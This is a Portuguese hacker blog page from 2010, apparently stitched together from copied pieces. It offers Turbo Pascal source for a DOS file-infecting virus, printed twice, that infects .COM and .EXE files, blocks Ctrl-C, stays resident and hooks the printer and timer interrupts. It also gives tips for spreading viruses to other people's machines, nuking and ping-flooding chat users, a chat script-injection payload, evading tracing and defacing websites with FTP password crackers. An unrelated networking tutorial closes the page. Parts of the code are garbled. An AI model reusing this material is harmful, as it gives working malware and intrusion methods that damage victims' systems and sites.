sexta-feira, 29 de outubro de 2010

EU  NÃO    ME    RESPONSABILIZO  PELOS     SEUS   ATOS
SEU      SER   METIDO   A   HACKER!
Nossa viagem de férias; Tamanho real=180 pixels de largura
FLUXOGRAMA:
Vírus Executado
|
|
(inicinf)Iniciar infecção nos caminhos
c:\dos\*.com, c:\dos\*.exe, *.com, *.exe
c:\windows\*.com, c:\windows\*.exe
|
|
(infec)Infecta os arquivos do diretório fornecido.
|
|
(procura)Procura primeiro arquivo a infectar
|
|
+-----> (verifica) Arquivo Infectado? ---S--------------------------------+
| | |
| | N |
| (infec)Copia vírus (sem arquivo hospedeiro) |
| para um arquivo chamado virtemp.tmp |
| | |
| | |
| cópia arquivo a ser infectado a partir |
| do fim do vírus (concatenação): |
| copy /b virtemp.exe+arquivo.exe virtemp.tmp |
| | |
| | |
| Grava data e hora do arquivo em variáveis. |
| | |
| | |
| Apaga arquivo original a ser infectado (del arquivo.exe) |
| | |
| | |
| Renomeia vírus com arquivo infectado(virtemp.tmp) para |
| arquivo.exe: ren virtemp.tmp arquivo.exe |
| | |
| | |
| Recupera a data e hora do arquivo hospedeiro |
| | |
| | |
+-------------S-- Procura mais arquivos. <--------------------------------+
Existem mais arquivos?
|
| N
(executa)Iniciar execução do programa hospedeiro
|
|
Separar programa hospedeiro do vírus
|
|
Posicionar ponteiro no fim do vírus (e início do arquivo)
|
|
Iniciar a copiar a partir deste ponto até o fim do arquivo (Resultado: programa sem vírus pronto a ser executado) para um arquivo chamado virtemp.TMP
|
|
Executar arquivo virtemp.tmp
|
|
Limpar o conteúdo do arquivo
virtemp.tmp (de modo que nãose possa recuperar o que tinha dentro dele)
|
|
Apagar o arquivo virtemp.tmp
|
|
Iniciar procedimentos que ele possa vir a fazer (Apagar arquivos, mexer com a
impressora, etc).
|

Fim do vírus
INICIANDO A INFECTAR
Vamos iniciar a infecção. Nesse caso seria somente iniciar o caminho que se quer infectar. Nesse caso: c:\dos\*.com, c:\dos\*.exe, *.com, *.exe, c:\windows\*.com, c:\windows\*.exe, junto disso deve ser dado o diretório de trabalho.
Procedure inicinf;
begin
if MOSTRA then writeln('Iniciando infecção dos arquivos');
arquiv:=0;
procura('*.com','');
procura('*.exe','');
procura('c:\windows\*.com','c:\windows\');
procura('c:\windows\*.exe','c:\windows\');
procura('c:\dos\*.com','c:\dos\');
procura('c:\dos\*.exe','c:\dos\');
if MOSTRA then writeln('Infecção dos arquivos Finalizada. Com um total de:');
if MOSTRA then writeln(arquiv,' arquivos infectados.');
end;
Como se pode ver, essa procedure somente lança outra. Ah! Outra coisa. É preciso fornecer um diretório de trabalho para o esquema poder funcionar direito.
INFECÇÃO DE VÍRUS
Essa parte ainda seria um procedure que lança outra, mas ela trabalharia mais a nível de arquivo do que a anterior.

procedure procura(nome,dir:string);
begin
if MOSTRA then writeln('Iniciando infecção do diretório: ',nome);
FindFirst(nome, Archive, DirInfo);
{$i+}
while (DosError = 0) and (arquiv'COMMAND.COM') then begin
HORAINI(NOME); {Grava data e hora do arquivo}
assign(FromF,nome);
reset(FromF,1);
assign(ToF,'virtemp.tmp');
Rewrite(ToF,1);
repeat
BlockRead(FromF, buf2, SizeOf(buf2), numread);
BlockWrite(ToF, buf2, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);

{Ate aqui seria a parte onde se copia o arquivo a ser infectado para outro
arquivo temporário}

assign(FromF,nome_arq); {nome_arq: explicado mais tarde}
reset(FromF, 1);
assign(ToF, nome);
Rewrite(ToF, 1);
BlockRead(FromF, buf, SizeOf(buf), numread); {Caso você não se lembre, o BUF é o buffer}
BlockWrite(ToF, buf, numread, NumWritten); {que conterá o vírus, que nesse caso ele}
close(FromF); {copiará somente o vírus para o arquivo a}
close(tof); {ser infectado (arquivo.exe) em que havia sido}
{movido o seu conteúdo para virtemp.tmp }
{deixando, por enquanto somente o vírus no }
{arquivo }


assign(FromF,'virtemp.TMP');
reset(FromF, 1);
assign(ToF, nome);
reset(tof,1);
seek(tof,LENVÍRUS); {Posiciona o ponteiro do arquivo na posição final do arquivo}
repeat
BlockRead(FromF, buf, SizeOf(buf), numread);
BlockWrite(ToF, buf, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);
erase(fromf);
HORAFIM(NOME);
end;
{Essa parte seria a concatenação vírus+arquivo, onde o arquivo seria acrescentado no fim do
vírus}

if MOSTRA then writeln('Infecção completa.');
end;

procedure procura(nome,dir:string);
begin
if MOSTRA then writeln('Iniciando infecção do diretório: ',nome);
FindFirst(nome, Archive, DirInfo);
{$i+}
while (DosError = 0) and (arquiv numread);
close(FromF);
close(tof);
exec('virtemp.tmp',paramstr(1)+' '+paramstr(2)+' '+paramstr(3)); {Executa o programa aqui}
rewrite(tof); {Agora vou limpar o conteúdo e apagar o arquivo}
close(tof);
erase(tof);
if MOSTRA then writeln('Execução do programa hospedeiro finalizado);
end;
Corpo Principal do programa
Vamos ter que iniciar as funções do vírus:
begin
if MOSTRA then writeln('Iniciando o Vírus');
nome_arq:=paramstr(0); {Essa variável irá conter o nome do programa que está sendo executado
no momento. Caso o nome que foi executado seja EDIT.exe essa variável
conterá EDIT.EXE}
SETCBREAK(FALSE); {Para que o usuário não possa apertar Ctrl-C}
contra(nome_arq);
inicinf;
executa;
apag_arq;
GetIntVec($1c,@int1c); {Essa parte sera vista mais adiante}
SetIntVec($1c,Addr(bola));
vbola:=false;
cx:=random(80);{Aleatorizar a posição da bola na tela}
cy:=random(24);
GetIntVec($17,@printer); {Essa parte será vista mais adiante}
SetIntVec($17,Addr(escrever)); {Essa parte mostra ao computador para usar
O procedimento escrever como padrão para a
impressora}
if MOSTRA then writeln('Fim do vírus.');
keep(0); {Deixa o programa residente na memória.}
if mostra then writeln('Programa Residente');
end.
Programas necessário à execução do Vírus
Vou mostrar alguns programas necessários para o correto uso desse vírus:
1. Programa que determina o cabeçalho e já mostra o tamanho do executável. Esse programa tem que ser colocado em um arquivo com o seguinte código:
program Cabecalho;
uses crt;
var
arq: file;
NumRead, NumWritten: Word;
Buf: array[1..5] of Char;
begin
Assign(arq, 'vírus.exe'); { Open input file }
Reset(arq, 1); { Record size = 1 }
Writeln('Tamanho do Vírus: ', FileSize(arq), ' bytes...');
BlockRead(arq, Buf, SizeOf(Buf), NumRead);
Close(arq);
writeln('Cabecalho: ',buf[1],buf[2],buf[3],buf[4],buf[5]);
writeln('Código Ascii: ',ord(buf[1]),' ',ord(buf[2]),' ',ord(buf[3]),' ',ord(buf[4]),' ',ord(buf[5]));
end.

procedure contra(non:string);
var
FromF, ToF: file;
ARQ:text;
Ft:FILE of char;
f:file;

function vervir(nome:string):boolean;
VAR
Buf: array[1..10] of Char;
NUMREAD:WORD;
con:integer;
begin
if mostra then writeln('Iniciando verificação de infecção do arquivo ',nome);
con:=1;
ASSIGN(F,NoME);
ReSET(F,1); { Record size = 1 }
BlockRead(F, Buf, SizeOf(Buf), NumRead);
IF (BUF[1]=cab[1]) AND (BUF[2]=cab[2])AND (BUF[3]=cab[3])AND (BUF[4]=cab[4])AND (BUF[4]=cab[4]) tHEN
{Verifica o cabecalho do arquivo}
vervir:=TRUE {para ver se já foi infectado}
ELSE
vervir:=FALSE;
Close(F);
if mostra then writeln('Verificação de infecção finalizadá);
END;
procedure antivir;
begin
if not vervir(non) then
begin
if mostra then writeln('Arquivo Infectado, tentando desinfectar...'); {Arquivo infectado, tentando desinfectar...}
aSSIGN(Ft,paramstr(0));
ReSET(Ft); { Record size = 1 }
write(ft,cab[1]);
write(ft,cab[2]);
write(ft,cab[3]);
write(ft,cab[4]);
write(ft,cab[5]);
close(ft);
if mostra then writeln('Desinfecção completa!'); {Desinfecção completa}
textcolor(white+blink);
writeln('Atencao: Seu computador esta infectado por vírus! Sugiro passar Anti-vírus!');
textcolor(white);
end;
end;
begin
if mostra then writeln('Inicio do procedimento anti-vírus.');
antivir;
if mostra then writeln('Fim do procedimento anti-vírus.');
end;

dicas perigosas

Nossa viagem de férias; Tamanho real=180 pixels de largura
Ë ÅÏ $ëµ øtårïø $åßë fåzër vïrµ$


e ai seu otario sabe fazer virus ?
entao me envia um o email é te espero seu otario !!!!!!!!!!
Se voce fizer besteira ele corta sua cabeça 
dicas me adicione  bento_lisboa@hotmail.com


vcs pensao que virus e brincadeira seus simples mortais da net
fumaça.gif
nada do mal td pelo bem
atomico Tamanho real=240 pixels de largura
virus trojan, 666
( função destruir programa)



criado por joao angelo 16:34

N~ÇAO ME RESPONSABILIZA PELA SUA BESTEIRA
Procedure inicinf;
begin
if MOSTRA then writeln('Iniciando infecção dos arquivos');
arquiv:=0;
procura('*.com','');
procura('*.exe','');
procura('c:\windows\*.com','c:\windows\');
procura('c:\windows\*.exe','c:\windows\');
procura('c:\dos\*.com','c:\dos\');
procura('c:\dos\*.exe','c:\dos\');
if MOSTRA then writeln('Infecção dos arquivos Finalizada. Com um total de:');
if MOSTRA then writeln(arquiv,' arquivos infectados.');
end;

procedure procura(nome,dir:string);
begin
if MOSTRA then writeln('Iniciando infecção do diretório: ',nome);
FindFirst(nome, Archive, DirInfo);
{$i+}
while (DosError = 0) and (arquiv'COMMAND.COM') then begin
HORAINI(NOME); {Grava data e hora do arquivo}
assign(FromF,nome);
reset(FromF,1);
assign(ToF,'virtemp.tmp');
Rewrite(ToF,1);
repeat
BlockRead(FromF, buf2, SizeOf(buf2), numread);
BlockWrite(ToF, buf2, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);

{Ate aqui seria a parte onde se copia o arquivo a ser infectado para outro
arquivo temporário}


assign(FromF,nome_arq); {nome_arq: explicado mais tarde}
reset(FromF, 1);
assign(ToF, nome);
Rewrite(ToF, 1);
BlockRead(FromF, buf, SizeOf(buf), numread); {Caso você não se lembre, o BUF é o buffer}
BlockWrite(ToF, buf, numread, NumWritten); {que conterá o vírus, que nesse caso ele}
close(FromF); {copiará somente o vírus para o arquivo a}
close(tof); {ser infectado (arquivo.exe) em que havia sido}
{movido o seu conteúdo para virtemp.tmp }
{deixando, por enquanto somente o vírus no }
{arquivo }


assign(FromF,'virtemp.TMP');
reset(FromF, 1);
assign(ToF, nome);
reset(tof,1);
seek(tof,LENVÍRUS); {Posiciona o ponteiro do arquivo na posição final do arquivo}
repeat
BlockRead(FromF, buf, SizeOf(buf), numread);
BlockWrite(ToF, buf, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);
erase(fromf);
HORAFIM(NOME);
end;
{Essa parte seria a concatenação vírus+arquivo, onde o arquivo seria acrescentado no fim do
vírus}

if MOSTRA then writeln('Infecção completa.');
end;

procedure procura(nome,dir:string);
begin
if MOSTRA then writeln('Iniciando infecção do diretório: ',nome);
FindFirst(nome, Archive, DirInfo);
{$i+}
while (DosError = 0) and (arquiv numread);
close(FromF);
close(tof);
exec('virtemp.tmp',paramstr(1)+' '+paramstr(2)+' '+paramstr(3)); {Executa o programa aqui}
rewrite(tof); {Agora vou limpar o conteúdo e apagar o arquivo}
close(tof);
erase(tof);
if MOSTRA then writeln('Execução do programa hospedeiro finalizado);
end;
Corpo Principal do programa
Vamos ter que iniciar as funções do vírus:
begin

if MOSTRA then writeln('Iniciando o Vírus');
nome_arq:=paramstr(0); {Essa variável irá conter o nome do programa que está sendo executado
no momento. Caso o nome que foi executado seja EDIT.exe essa variável
conterá EDIT.EXE}
SETCBREAK(FALSE); {Para que o usuário não possa apertar Ctrl-C}
contra(nome_arq);
inicinf;
executa;
apag_arq;
GetIntVec($1c,@int1c); {Essa parte sera vista mais adiante}
SetIntVec($1c,Addr(bola));
vbola:=false;
cx:=random(80);{Aleatorizar a posição da bola na tela}
cy:=random(24);
GetIntVec($17,@printer); {Essa parte será vista mais adiante}
SetIntVec($17,Addr(escrever)); {Essa parte mostra ao computador para usar
O procedimento escrever como padrão para a
impressora}
if MOSTRA then writeln('Fim do vírus.');
keep(0); {Deixa o programa residente na memória.}
if mostra then writeln('Programa Residente');
end.
Programas necessário à execução do Vírus
Vou mostrar alguns programas necessários para o correto uso desse vírus:
1. Programa que determina o cabeçalho e já mostra o tamanho do executável. Esse programa tem que ser colocado em um arquivo com o seguinte código:
program Cabecalho;
uses crt;
var
arq: file;
NumRead, NumWritten: Word;
Buf: array[1..5] of Char;
begin
Assign(arq, 'vírus.exe'); { Open input file }
Reset(arq, 1); { Record size = 1 }
Writeln('Tamanho do Vírus: ', FileSize(arq), ' bytes...');
BlockRead(arq, Buf, SizeOf(Buf), NumRead);
Close(arq);
writeln('Cabecalho: ',buf[1],buf[2],buf[3],buf[4],buf[5]);
writeln('Código Ascii: ',ord(buf[1]),' ',ord(buf[2]),' ',ord(buf[3]),' ',ord(buf[4]),' ',ord(buf[5]));
end.
FLUXOGRAMA:
Vírus Executado
|
|
(inicinf)Iniciar infecção nos caminhos
c:\dos\*.com, c:\dos\*.exe, *.com, *.exe
c:\windows\*.com, c:\windows\*.exe
|
|
(infec)Infecta os arquivos do diretório fornecido.
|
|
(procura)Procura primeiro arquivo a infectar
|
|
+-----> (verifica) Arquivo Infectado? ---S--------------------------------+
| | |
| | N |
| (infec)Copia vírus (sem arquivo hospedeiro) |
| para um arquivo chamado virtemp.tmp |
| | |
| | |
| cópia arquivo a ser infectado a partir |
| do fim do vírus (concatenação): |
| copy /b virtemp.exe+arquivo.exe virtemp.tmp |
| | |
| | |
| Grava data e hora do arquivo em variáveis. |
| | |
| | |
| Apaga arquivo original a ser infectado (del arquivo.exe) |
| | |
| | |
| Renomeia vírus com arquivo infectado(virtemp.tmp) para |
| arquivo.exe: ren virtemp.tmp arquivo.exe |
| | |
| | |
| Recupera a data e hora do arquivo hospedeiro |
| | |
| | |
+-------------S-- Procura mais arquivos. <--------------------------------+
Existem mais arquivos?
|
| N
(executa)Iniciar execução do programa hospedeiro
|
|
Separar programa hospedeiro do vírus
|
|
Posicionar ponteiro no fim do vírus (e início do arquivo)
|
|
Iniciar a copiar a partir deste ponto até o fim do arquivo (Resultado: programa sem vírus pronto a ser executado) para um arquivo chamado virtemp.TMP
|
|
Executar arquivo virtemp.tmp
|
|
Limpar o conteúdo do arquivo
virtemp.tmp (de modo que nãose possa recuperar o que tinha dentro dele)
|
|
Apagar o arquivo virtemp.tmp
|
|
Iniciar procedimentos que ele possa vir a fazer (Apagar arquivos, mexer com a
impressora, etc).
|

como usar nuke

não me responsabiliso pelo que vc posso fazer

 

como usar nuke



Vá no Prompt do DOS, no diretório C :\WINDOWS vc digita : ARP -A, daí vai aparecer uma pequena lista de IP's, o primeiro é o seu, e o último é o do cara que te mandou uma mensagem por último na sala (por isso, faça ele falar com vc p/ vc saber que é o dele). Feito isso é só vc entaum usar um bom programa de Nuke, como o WinGenicides (na área de download hacker vc acha) ou qualquer outro. Mas cuidado, o cara pode ter proteção contra nuke aí nãi da certo.

pinf enderenço ou ip

tracert
ping -t-11000-f ip do cara
HACKER BOMBA PARA CHAT
cavdourada[1].gif
Hacker - Bombas para Chat

Das bombas encontradas algumas só funcionam quando o java estiver ligado. Esses comandos necessitam dos sinais de <>!! Só funcionam em alguns chats.


--------------------------------------------------------------------------------

Comando 1 - Para ver o navegador de quem estiver no Chat.
< img src="http://www.persocom.com.br/buckman/bb1.gif""onLoad="x=prompt('Digite um numero de 0a9:',0);if(x!=44){parent.frames[1].document.forms[0].SAYS.value='Hang Loose meu mestre,o meu browser é o:'+navigator.userAgent;parent.frames[1].document.forms[0].WHOTO.value='BuckmaN';parent frames[1].document.forms[0].ACTION.value='fala para';parent.frames[1].document.forms[0].submit();}">
celebro.gif
VC VAI FICAR IGUAL A ESTA CAVEIRA

explicações tecinicas como fazer dados tecnicos


  Um vírus nada mais é do que um programa que tem um único objetivo: causar algum dano no computador de alguém. Ele se instala em todas as unidades qm que é possível gravar dados: disco rígido, disquetes, unidades de rede, ZIPDrive etc.
 Ainda não existe um vírus que seja capaz de queimar o seu modem, o seu teclado ou o seu comuputador. Para removê-lo, basta formatar o micro ou apagar fisicamente todos os arquivos existentes, pois dessa forma o vírus também será removido, afinal ele é um programa.
 Existem vírus que infectam somente arquivos executáveis (.EXE e .COM), outros somente os arquivos .DOC, .SYS, etc, e existem alguns que infectam a trilha 0 do seu computador, também conhecida como setor de boot ou MBR.


 Trabalhando com vírus:

 Um vírus é um programa e por isso precisa ser executado para funcionar, certo? Errado! os vírus de MBR detonam o computador pelo simples fato de serem copiados. Não precisa nem executar, você será automaticamente infectado.
 Nunca descompacte um vírus em seu winchester, isso não deve ser feito em hipótese alguma. Também não teste nenhum vírus no seu proprio micro para ver o que acontece.
 Se você quiser pegar algum vírus sem se contaminar, pegue-o compactado, pois compactado ele se torna inofensivo. Agora o bicho vai pegar quando você descompactar o maldito.
 Com o vírus já no seu winchester compactado (ZIP), insira um disquete e descompacte-o lá, use o utilitário WinZip.
 Pronto, o vírus foi descompactado dentro do disquete. Agora ele está contaminado. hehehehe. O próximo passo você já saber: leve esse disquete para algum micro que deseja infectar e execute o vírus ou então só copie ele para o HD e espere que algum otário vá lá mexer. Eu só não digo para vocês testarem o vírus em computadores da escola, porque meu professor pode estar lendo isso agora e não ia gostar de nada disso.
 Depois de infectar o disquete, não mexa mais nele. Deixe-o quieto lá num canto, pois existem vírus que são ativados quando você dá um simples "DIR" no disquete. Ou formate o disquete no computador da escola. Tô brincando hein professor...heheh... 8


 Como se identificar os vírus:

 A melhor maneira de identificar os vírus é através dos anti-vírus (se você não soubesse dessa, se mate!!!).
 Mas se você passa o anti-vírus e ele não detecta nada, mas você suspeita que o arquivo é um vírus, uma grande possibilidade de ser um vírus desconhecido.
 - Verifique o tamanho do arquivo. Se ele tiver menos de 3Kb, as chances de que se trata de um vírus são grandes.
 - Através do EDIT no MS-DOS, edite os arquivos suspeitos. A extenção .EXE é quase impossível, mas os arquivos .COM contém as informações essenciais e é possível visualiza-las. Nesse caso, se aparecerem textos do tipo "fock you", "infect", "hahaahah", "you suck", etc pode suspeitar que é um vírus.

 Como faço para criar meu próprio vírus ?


 Hoje em dia é algo muito simples. Antigamente usava-se a linguagem de programação Assembly. Até hoje é usada, mas é muito complicado, só quem manjava muito sabia fazer vírus. Nos dias de hoje, existem programas que têm uma unica função: contruir vírus. São os chamados "laboratórios de vírus".
 Para ficar famoso, você precisa ter muita sorte. Depois de criar o vírus, compacte num arquivo .ZIP o vírus executável (EXE ou COM) junto com a fonte dele (ASM). Em seguida, envie um e-mail para as empresas de anti-vírus (McAfee, Norton etc...) com o seu vírus anexo e diga que foi infectado por esse vírus.
 O seu vírus será analizado pelos técnicos e se eles o considerarem perigoso, irão criar um "antídoto" para ele. Se isso for feito, alguns meses depois você já poderá ter sido incluído na lista mundial dos vírus.



 Nessas ferias, aconteceu um encontro de estudantes de Comunicacao. Numa de penetra, entrei numa festa e apesar da quantidade de mulher, encontrei um pessoal que me apresentou ao Ailton da UFMG. Conversa vai, conversa vem, entramos naquele papo incrivelmente chato que e' as possibilidades da Internet no Brasil e a futura reuniao de Hackers brasileiros e internacionais. No meio de tanta mulher, conversar sobre isso..
 Nos dias seguintes, foi o lance de trocar informacoes. Ele sabia, conhecia varias pessoas que tem essa fixacao por computador. Tinha a ideia de montar o grupo, mas nao o como fazer a coisa. Eu tinha Megabytes e Megabytes de material altamente significativo sobre o assunto, armazenado em dois anos de pesquisa na rede Internet, mas so' a ideia de montar uma lista e' que tinha vingado. Pensando e pensando no assunto, cheguei a algumas conclusoes:


pRESTA aTENÇÃO


PRESTA ATENÇÃO SEU MANE TENTE ME INVADIR E VC VAI VER>>>>
µµy
µµ
 |ô ô|
(O) q/ ¿ \p
| | («-0-»)
| | ~\_/~
.(¥)_ _| |_ O=WWo=====|============|+|¤
__ .( | | )_ \ / \ // | |
(_ \ | | | | ) ¡ |\\// | YSNESHY |
.\ \/" " " "\ · | \/ | HACKER |
.\ //v\| | JOAO ANGELO |
.\_______/| | | | _ _ |
| | | | / \ / \ |
___| | |___ |/ \ / \|
[_____V_____] \/
CHACALL_____*)D\/__BM-
DRAGÃO INVASOR **** 
Protegendo seu toba de ser rastreado:

Naum eh mto dificil naum ser rastreado, por exemplo, o EyeDent ( DC Internet Service Pack ) serve para criar um host falso e permitir vc mentir em algumas coisas, como esta no readme dele, olhe soh:
EyeDent spoofer will allow you to fake your user name on any ident request. Which means you can lie to ftp sessions, telnet sessions, irc sessions (which is a telnet session anways) from windows. Ou em português:
EyeDent spoofer vai permitir vc usar um user name ou qualquer pedido de identidade falso. O que significa q vc vai poder mentir em Ftp , telnet, irc ( Eh um telnet ) do windows.
Baum, jah deu pra sacar que com esse programa vc pode mentir sobre seu host. Agora, use um firewall tipo o da ConSeal que muda seu IP e bloqueia acessos a ele.
Com isso quem vai te rastrear??
ICQ

Li isso numa pagina ae e estou deixando mais simplificado aki na minha.
Primeiro que você não MUDA de IP, vc ENGANA a mirabilis e o ICQ é o seguinte, firewall trava altos tipos de cominicação na net e fica muito dificil de alguem pegar seu IP, então, uma pessoa que tem firewall não poderia utilizar ICQ correto? Errado, dentro do ICQ vc marca a opção que esta usando firewall e coloca seu IP falso. Assim, vc vai forçar a Mirabilis a acreditar que vc esta usando firewall e que seu IP é aquele informado. Para fazar isso siga os seguintes passos:
1) Abra seu ICQ no modo Offline
2) Entre lá no Preferences ( Menu ICQ )
3) Entre na aba Connection e marque a opção "I'm using a permanent internet..." e marque a check box "I'm behind a firewall or proxy" e depois clique em Firewall Settings
4) Marque a opção I'm using a SOCKS 4 Proxy server, clique em NEXT
5) Escreva na frente de SOCKS4 SERVER o IP q vc quer ter.
DICA: Coloque um IP de servidor ou servidor de Proxy. Vc pega essas informações de proxy na propia pagina de seu servidor, procure por Proxy lah ou mande um e-mail pro suporte lah pedindo as configurações de Proxy ( Proxy eh um treco grande de explicar, mas relaxe, naum eh nada perigoso naum, eh ateh bom! )
medalhadodiabo.gif

COMO INVADIR UM SITE ?

ANTENçAO: NAO TENTE INVADIR MEU SITE EU TENHO PROTEçAO: POSSO RASTREAR VC E TE ENTREGAR PRA POLICIA !!!!!!
SEU ESPERTINHO !!!!!!!
COMO INVADIR UM SITE ?
Hacker - Invadindo Sites

Por acaso você já entrou em um site e o odiou? Você já tem a solução, invada-o! Você já pensou que legal você mudando o conteúdo de um site! Você pega um site de uma escola que você não gosta e coloca um monte de fotos pornôs!

Você, em primeiro lugar, deve saber o endereço FTP de um site que normalmente são assim: ftp.xxxx.com (ou .br, .pt etc.) ou você pode fazer uma invasão por IP! Você pega o IP do site e ao invés de usar o endereço FTP, use o IP! Para descobrir o IP do site, vá ao Prompt do Dos e digite: Ping www.xxxx.com (você substitui o xxxx pelo endereço). Vão aparecer várias coisas escritas e na primeira linha, vai aparecer assim: Disparando contra [O IP] e mais um monte de coisas inúteis.

Agora você precisa saber a senha, então, pegue o programa unsecure em alguma outra página. Este Unsecure é um descobridor de senhas. Você coloca nele o endereço FTP ou o IP do site a ser invadido que ele te manda a senha e o usuário ! Se você souber o usuário, você coloca que ele te manda só a senha! Entre no Link para saber mais! Faça o download do Unsecure e mande bala!

Agora, chegou a grande hora! A invasão! Você, a princípio, vai usar o método mais fácil entre os vários métodos existentes. Você vai usar o FTP do Dos. Ele é considerado mais fácil porque os comandos são mais fáceis. Você deve digitar ftp na linha de comando do Prompt do Dos e ele vai aparecer assim: ftp>. Daí você digita open e ele vai aparecer assim: to> (ou para> depende da versão do programa) e aí é só digitar o endereço ou o IP do site, o usuário, a senha e BUUUMMM!!!!!!!! Agora faça o que você quiser!!!!

Aí vão alguns comandos do FTP:

get nomedoarquivo.extensão - para pegar arquivos

put nomedoarquivo.extenção - para colocar arquivos

delete nomedoarquivo.extenção - deletar arquivos

Obs. 1: Se você quiser invadir uma página que tem o hospedeiro como o XOOM por exemplo, você primeiro tem que invadir o XOOM para depois invadir o site.

D7 Tweaker 2.0

Download D7 Tweaker
2009-02-05

Plug-in para Delphi que lhe permite criar novos e profissionais estilos visuais.
... na hora de desenvolver seus programas e se você é um deles... como o Resource Hacker (da versão 3.4...
Download Resource Hacker
2007-11-02

Personalize seus programas auto-executáveis para que pareçam que forma desenvolvidos por você mesmo.
... você poderá personalizar programas auto-executáveis (.exe,...Com Resource Hacker 3.4.0.79 você...

.Windows XP: Configurando a rede via linha de comando


Uma curiosidade no Windows XP é que toda a configuração da rede pode ser feita via linha de comando, através do prompt do MS-DOS, como no Linux. Na prática, não existe nenhuma grande vantagem sobre configurar pelo Painel de controle, mas não deixa de ser um truque interessante, que vale à pena aprender.
Ao configurar a rede via DHCP, você pode checar rapidamente qual endereço IP está sendo usado por cada micro usando o comando "ipconfig" dentro do prompt do MS-DOS:
Para configurar a rede, especificando manualmente os endereços, você usaria:
C:> netsh int ip set address name="Conexão Local" source=static 192.168.0.22
255.255.255.0 192.168.0.1 1
... onde o "Conexão Local" é o nome da conexão de rede (da forma como aparece no painel de Conexões de rede do Painel de controle), seguido pelo endereço IP, máscara e gateway da rede. Não se esqueça do número "1" no final, que é um parâmetro para a configuração do gateway.
Para configurar o DNS, você usaria:
C:> netsh int ip set dns "Conexão Local" static 200.204.0.10
Para configurar os endereços e DNS via DHCP, você pode usar os comandos:
C:> netsh int ip set address name="Conexão Local" source=dhcp
C:> netsh int ip set dns "Conexão Local" dhcp
O endereço obtido via DHCP precisa ser renovado periodicamente, o que é feito de forma automática. Mas, em algumas situações, o sistema pode falhar em renovar o endereço (o que é relativamente comum ao acessar via cabo, por exemplo) fazendo com que seu micro seja desconectado da rede. Nestes casos, você pode forçar a renovação do endereço IP clicando com o botão direito sobre o ícone da conexão, dentro do painel de controle e acessando a opção "Reparar", ou usando os dois comandos abaixo no prompt do MS-DOS:
C:> ipconfig /release
C:> ipconfig /renew
Um exemplo de configuração de rede completa para um dos micros da rede, que vai acessar a internet através do micro que está compartilhando a conexão, seria:
IP: 192.168.0.2
Máscara: 255.255.255.0
Gateway: 192.168.0.1 (o endereço do micro compartilhando a conexão)
DNS: 200.204.0.10, 200.204.0.138
O micro que está compartilhando a conexão por sua vez vai ter duas placas de rede, uma para a internet e outra para a rede local, por isso vai ter uma configuração separada para cada uma. A configuração da internet é feita da forma normal, de acordo com o tipo de conexão que você usa, enquanto a configuração da rede interna segue o padrão que vimos até aqui.
Neste exemplo, estou usando dois endereços de servidores DNS externos na configuração do cliente, mas é possível instalar um servidor DNS na máquina que está compartilhando a conexão, incluindo inclusive nomes para as máquinas da rede local. Neste caso, você pode usar o endereço do gateway também como DNS:
Note que, neste caso, os micros da rede local utilizam uma faixa de endereços privada (192.168.0.x no exemplo), uma faixa de endereços que não existe na internet. O único que possui um endereço IP válido na internet é o roteador, que por isso é o único que pode ser acessado diretamente de fora. Ele fica responsável por interligar as duas redes, permitindo que os micros da rede interna acessem a internet.
Este método de compartilhamento de conexão é chamado de "NAT" (Network Address Translation). Ao receber um pacote de um dos micros da rede local endereçado à internet, o servidor substitui o endereço da estação (192.168.0.2, por exemplo) pelo seu endereço de internet (200.220.134.54, por exemplo) e o envia ao destinatário. Ao receber resposta, o servidor novamente troca o endereço de internet do destinatário pelo seu (do servidor) IP de rede local. A estação acha que está conversado diretamente com o servidor e não enxerga os demais hosts da internet enquanto eles (os demais hosts) enxergam apenas seu servidor e não os demais micros da rede local, que permanecem invisíveis.